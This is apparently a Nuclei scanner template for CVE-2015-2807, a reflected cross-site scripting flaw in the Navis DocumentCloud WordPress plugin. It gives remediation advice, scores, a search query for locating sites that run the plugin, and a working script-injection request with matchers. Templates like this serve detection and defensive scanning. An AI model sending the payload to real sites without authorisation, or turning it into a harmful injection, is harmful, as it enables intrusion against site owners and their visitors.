id: CVE-2015-2807 info: name: Navis DocumentCloud <0.1.1 - Cross-Site Scripting author: daffainfo severity: medium description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. remediation: | Upgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://wordpress.org/plugins/navis-documentcloud/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 - https://wpvulndb.com/vulnerabilities/8164 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00665 epss-percentile: 0.77402 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: documentcloud product: navis_documentcloud framework: wordpress google-query: inurl:"/wp-content/plugins/navis-documentcloud" tags: cve,cve2015,wordpress,wp-plugin,xss http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a0046304402204c4d7a541e8b24be7f66458bd24de059a576981d8c3c38cb3c5d81985629f83402203e7eca116f1fa2aff965474b60951c09f3f9d3b14c9c06fa39e82967dee59f74:922c64590222798bb761d5b6d8e72950